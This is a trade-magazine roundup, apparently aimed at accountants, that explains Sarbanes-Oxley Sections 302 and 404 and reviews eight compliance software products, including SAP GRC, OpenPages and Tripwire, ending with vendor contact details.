The Sarbanes-Oxley Act was passed in 2002. Six years later, subject companies are still in the process of trying to comply with its provisions. Add in the fact that other countries are implementing similar financial regulations, some of which U.S. companies operating in those countries are subject to, and it’s easy to see why SOX compliance is still a hot issue.While it seems like everyone is still arguing about implementation issues and which companies should be subject to which provisions, the main effect of Sarbanes-Oxley is to move the ultimate responsibility for the accuracy of financial reports from the outside auditor to the company’s management. “The accountant cooked the books!” is no longer acceptable. The company has to have sufficient internal controls and procedures to detect if the books are being cooked. Under Section 302, management has to certify the appropriateness and fairness of the financial statements, regardless of what an external auditor reports.
Financial reporting standards, as well as GAAP and best practices, have always required internal controls. With SOX, it’s your clients’ responsibility to prove that those internal controls actually exist and work the way they are supposed to. That’s a documentation issue as well as a process and workflow issue, and is the crux of Section 404.
NOT ALL TO ALL
There isn’t any one SOX compliance application that addresses every issue of concern. Many companies will have to implement two or more tools to feel comfortable that they are complying with the essential issues that SOX addresses. Risk management is also a component of compliance. There’s no way that a company can be 100 percent certain that the procedures and internal controls are completely effective. And even if it were possible, this level of confidence would be so expensive that no company could afford it.
Many of the applications on the market address one or more of three major areas. Two of the three have to do with internal controls — access control and change control. The third is documentation.
Access control is tied in with segregation of duties. Not every employee should have the same level of access to features and procedures within a company. Access controls exist to enforce these SODs. The SOX compliance applications that address this area of internal controls either test existing controls to ensure that they actually work, or supplement the controls and procedures already in place. Equally important is change control. These applications track every transaction to make sure that they are made by employees authorized for that kind of transaction, and to provide an audit trail and report, so that any improper change can be detected and addressed.
Finally, SOX outlines specific kinds of documentation needs that should be addressed. These range from management surveys, to records of discovery and resolution of internal control incidents.
Much of SOX addresses IT functions, as IT is an integral component of financial transaction processing in any enterprise. In examining SOX compliance applications, many of them are compatible with the COSO Framework published by the Treadway Commission back in 1992 and updated in 2004. COSO consists of eight different components: internal control environment, objective setting, event identification, risk assessment, risk response, control activities, information and communications, and monitoring. This set of components was modified into a framework for IT governance called COBIT (Control OBjectives for Information and related Technology).
FREE IS GOOD TOO
For the most part, compliance software is expensive. While vendors are reluctant to quote prices due to the unknowns in installing and configuring a product, most of the applications detailed in this roundup can cost from $50,000 to upwards of several hundred thousand dollars before the application is up and running.
Not all compliance aids have to be this brutally expensive. While many tend to dismiss free utilities as being worth exactly what they cost, there are a couple of “freebies” that you might want to investigate.
For example, Microsoft offers a useful implementation template for MS Project in the section for Office downloads. This template, available at http://office.microsoft.com/en-us/templates, is a nice guide for performing internal control audits, as well as evaluating potential options for implementing Section 404 compliance.
Another useful free tool is the Application Discovery Tool from Sophos Inc. (online at www.sophos.com/products/, under “Free Tools”). Using this tool, which requires that the network server be using Active Directory, you and your clients can discover what applications, both authorized and unauthorized, exist on a network.
Strangely enough, this is one area that often gets overlooked in ramping up SOX compliance. If you were to travel to a client site, how many personal downloads such as MP3s, games and the like do you think you would find on some of the networked PCs? What do you think that says about your clients’ internal controls?
Regardless of how you go about it, the tools that you pick will vary from client to client, and often even from one location to another for the same client. There is no one universal SOX compliance application. To meet the requirements laid out in the different sections of Sarbanes-Oxley, and, increasingly, to meet other regulatory compliance requirements, you will have to help your clients choose the right fit of applications that provide them with assurance that they are adequately managing their risk, while still being affordable and flexible enough to be effectively employed.
To give you an idea of what is available to address your clients’ compliance needs, we looked at eight of the many applications available. All of these need to be installed by a reseller or VAR, and costs are quoted after determining how the implementation would take place.
AXENTIS FINANCIAL GRC SUITE
Axentis applications are built on the foundation of the vendor’s Axentis Enterprise platform, which is a Web-based Software-as-a-Service compliance engine. The Financial GRC Suite is one of a number of extensions to this platform that address different compliance areas and regulations. In addition to the Financial GRC Suite, the Enterprise platform supports the Legal & Regulatory Suite, the Ethics & Integrity Suite, the Information Privacy Suite, IT GRC and the ERM Suite. Your client may well benefit from some (or all) other additional suites to address compliance issues beyond SOX.
In the past, Axentis’ offering was named the Sarbanes-Oxley Management Suite. The new name reflects the fact that compliance issues are increasingly expanding with international reporting and compliance requirements such as J-SOX, K-SOX and EU SOS.
The Financial GRC Suite provides base services, including organization management, knowledge management and communication management, as well as reporting and analytics, and audit trail tracking. To these base services, the application adds risk and control management, which directly addresses Section 404 concerns. Management surveys are provided, as is online SOX training, which can greatly ease the pain of introducing new employees (or promoted employees) to what is required of them to meet regulatory requirements.
Other compliance areas covered by the Financial GRC Suite include incident management and document management capabilities that address Section 302 requirements. Axentis Financial GRC Suite, as well as the other suites based on the Enterprise foundation, is Web-based, and not tied to any specific ERM application.
FRONTRANGE ITSM
FrontRange Solutions is best known for its CRM product, GoldMine. The company also has very strong enterprise-level offerings in a number of other areas, including help desk management, and the ITSM (IT Service Management) application detailed here.
As with a number of other products included here, ITSM is not primarily targeted at SOX compliance. Rather, it is a more general IT compliance application that is appropriately used as a tool in your clients’ SOX compliance efforts.
Addressing the IT concerns in complying with SOX, ITSM encompasses several IT-related frameworks which encompass goals set down by SOX and COBIT. ITSM is designed around the Information Technology Infrastructure Library, a set of procedures and best practices originally developed in Britain. ITSM includes nine ITIL modules, each available separately: Incident Management, Problem Management, Change Management, Release Management, Service Level Management, Configuration Management, Availability Management, Knowledge Management, and Self Service. Not all of these modules are directly applicable to compliance with SOX, though even the ones that aren’t targeted to areas of compliance that SOX details are worthwhile in many enterprise businesses. All of these modules require an installed database for data collection. This database can be installed on a server and can be Oracle 9i or Microsoft Sequel 2000/SP3 or SQL 2005.
ITSM’s Incident Management, Problem Management and Change Management will most likely be the more applicable modules to assist with SOX compliance, though you can install each of them individually to cover holes left by other compliance packages.
As with pretty much all of the other packages in this roundup, FrontRange is reluctant to quote prices, as the end cost can vary greatly depending on which modules are installed and the ease or difficulty of integrating with existing applications. ITSM is sold and installed by resellers and VARs, as are almost all applications for SOX compliance.
OPENPAGES FCM
OpenPages has several packages that can be used to address Sarbanes-Oxley concerns. OpenPages Audit is an application that directly targets internal audit. It can provide risk assessment that will be useful in planning an audit of internal controls, as well as managing the audit itself, and keeping track of time, tasks and workpapers. OpenPages Audit integrates with most IT environments, and provides reports that can be used to meet the documentation requirements of Section 302.
OpenPages ITG (Information Technology Governance) provides a single repository for all compliance and risk documentation. It also allows the state of IT governance to be displayed in easy-to-understand dashboards. OpenPages ITG is compatible with most compliance frameworks, including COSO, COBIT, ITIL and ISO. Both of these applications can be used to address other compliance and regulatory requirements in addition to SOX.
The application most applicable to SOX and similar compliance requirements in other countries is OpenPages FCM (Financial Controls Management). OpenPages FCM has some capabilities found in other OpenPages applications, including the underlying central data repository, comprehensive audit trail, and dashboard displays of status and drill-down reports. FCM adds management surveys and workflow routing, which help meet Sections 302 and 404 requirements.
OpenPages is an enterprise-level application, and will integrate well with most financial accounting systems.
SAP SOLUTIONS FOR GRC
SAP Solutions for GRC (Governance, Risk and Compliance) are a highly integrated set of six modules — SAP GRC Risk Management; SAP GRC Access Control; SAP GRC Process Control; SAP GRC Global Trade Services; environment, health and safety compliance management applications; and GRC composite applications by SAP and Cisco. Of these modules, Risk Management, Access Control and Process Control would probably be of the most interest in providing SOX compliance — though if your client has a widely extended enterprise, the composite applications by SAP and Cisco can help extend and evaluate internal controls.
The module names are pretty descriptive of what each accomplishes. Access Control helps to identify and control access risks at all levels in the enterprise, while Risk Management helps detect and evaluate risks in financial, legal and operational areas. Finally, Process Control helps to monitor and enforce key controls affecting processes and workflows all throughout the enterprise.
All of the SAP Solutions for GRC are designed to work with SAP ERM applications.
SECURITY WEAVER
Developed as an application for users of SAP’s Web Application Server, Security Weaver is a set of five integrated modules that provide enhanced security, as well as access authorizations and tracking capability that are essential for maintaining and documenting internal controls that meet SOX requirements.
These modules consist of: Separations Enforcer, Emergency Repair, Secure Provisioning, Secure Audit and Secure Enterprise. The Separations Enforcer addresses the requirement for separation of duties in SAP. Segmenting and monitoring who in an organization has access to what areas is a fundamental consideration in internal controls. This is accomplished by creating an SOD matrix, monitoring access to SAP, recording SOD conflicts, and either adjusting the SOD matrix or following through with more effective controls. The Secure Enterprise extends this SOD monitoring capability throughout the enterprise.
The Emergency Repair module is useful in the event that access to SAP administrative areas is required after business hours. Employees can be pre-authorized for emergency access, and any repairs or other modifications are directly tied to that employee’s ID, with e-mail notification to appropriate supervisors when an emergency repair or access is required.
Access control is also addressed by the Secure Provisioning module. This allows an IT administrator to set up a policy matrix that automatically grants privileges and enforces restrictions for new, re-assigned and terminated employees. Conflicts with existing SOD are reported so that they can be immediately resolved.
Finally, the Secure Audit capabilities provide continuous monitoring of end-user transaction activity. This allows an organization to establish transaction-level internal controls and tracking, both of which will prove useful in performing the internal controls audit required by Sarbanes-Oxley.
EPROCESSMANAGER AND EPM3SOX
Some of the applications detailed here take a variety of approaches to SOX compliance. Transition/1’s ePM3SOx is process-based, and is COSO-compliant. It is an extension of the eProcessManager Suite, which helps you identify the business units, process cycles and key processes, and functional areas in the client’s business, and use COSO and COBIT templates, included with the application, to help define these.
The underlying model of the software is that all business operations are inherently process-based. EPM3SOx provides a methodology for evaluating that existing financial and disclosure systems are functioning as needed, and if not, to determine what changes are necessary for them to be in compliance with business goals and regulatory requirements.
This is done by assessing the inherent risks of each “process” and identifying its impact on financial reporting, operational effectiveness, regulatory compliance, and corporate goals and strategies. During this implementation, eProcessManager generates documentation such as narratives, flow charts and risk matrixes, all of which help meet Sarbanes-Oxley Section 302 requirements.
Once that is accomplished, the eProcessMonitor utility is used to provide ongoing real-time feedback to managers responsible for the process and the internal auditor and management responsible for remediation. This part of the application provides control test plan management and generates various required sign-offs.
One large benefit that eProcessManager and ePM3SOx offer is that it is independent of the underlying accounting application. This gives ePM3SOx the ability to work with many mid-market accounting systems, rather than only enterprise-level financial accounting applications.
TRINTECH UNITY FINANCIAL GOVERNANCE SUITE
One side effect of having a successful product is that other companies often look to acquire either the product, or the entire company. That’s exactly what happened to Movaris, recently acquired by Trintech. The Unity Financial Governance Suite continues to remain available.
Unity is actually a set of four applications that can be purchased and implemented individually or as an integrated suite. These four applications are Enterprise Risk Management, Compliance, Financial Close and Reporting, and Account Reconciliation. Of these four, Compliance and Close are of primary interest to those looking for SOX software.
For the most part, Unity Compliance addresses SOX Section 302 documentation requirements. The application has a number of modules, including a Control Status Console, which displays the status of individual control tests, summary controls status, and documentation status. A second module, the Control Exception Console, highlights high-risk controls and provides interactive reports concerning remediation and exceptions.
The third module, a Multi-Dimensional Scoping Manager, evaluates controls to establish whether they are in-scope (requiring testing) or out-of-scope (do not require testing). This determination is made based on rules established by management and helps management determine which controls have or do not have a material effect on financial statements.
A second component of the Unity platform is Unity Financial Close, formerly named OneClose. This is a “last mile” application that analyzes and controls the manual processes performed during the closing process to ensure that nothing unauthorized slips into the financials at the last minute. It does this by analyzing where the adjusting entries are coming from, and subjecting them to a risk analysis, displaying the results on a dashboard.
TRIPWIRE ENTERPRISE
Rather than trying to be all things to all users in the SOX compliance market, Tripwire concentrates on using the COSO/COBIT framework to establish internal controls on the IT function outside of those controls that exist in the applications and operating system.
Available in Enterprise and Server editions, Tripwire monitors all changes, whether they are to an application, data file or the operating system, and records every change, alerting the appropriate person if someone is trying to make a change outside the access rules established by the administrator.
This monitoring is continuous and comprehensive, with various dashboards and reports available to keep management alerted to any unauthorized or suspicious changes.
While the Server edition is fairly limited, and probably not the best choice for use in SOX compliance, the Enterprise edition of Tripwire has separate components to monitor applications, directory services, databases (Oracle 9 and 10g, Microsoft SQL Server 2000 and 2005), middleware, operating systems, virtual environments and network devices.
By itself, Tripwire is not a complete SOX or internal control solution. It does, however, go a long way towards addressing Section 404 concerns.
Ted Needleman, a former editor of Accounting Technology, is a consultant and freelance writer based in Stony Point, N.Y.
Vendor Information
Axentis Financial GRC Suite
Axentis Inc.
Cleveland
(800) 955-2706
www.axentis.com
FrontRange ITSM
FrontRange Solutions Inc.
Pleasanton, Calif.
(800) 776-7889
www.frontrange.com
OpenPages FCM
OpenPages
Waltham, Mass.
(781) 647-3800
www.openpages.com
SAP Solutions for GRC
SAP America Inc.
Newtown Square, Pa.
(800) 872-1727
www.sap.com/grc
Security Weaver
Security Weaver
Carlsbad, Calif.
(800) 620-4210
www.securityweaver.com
eProcessManager and ePM3SOX
Transition/1 Management
Accounting Systems Inc.
Long Beach, Calif.
(866) 590-4376
www.eprocessmanager.com
Trintech Unity Financial
Governance Suite
Trintech Inc.
Addison, Texas
(800) 416-0075
www.trintech.com
Tripwire Enterprise
Tripwire Inc.
Portland, Ore.
(800) 874-7947
www.tripwire.com
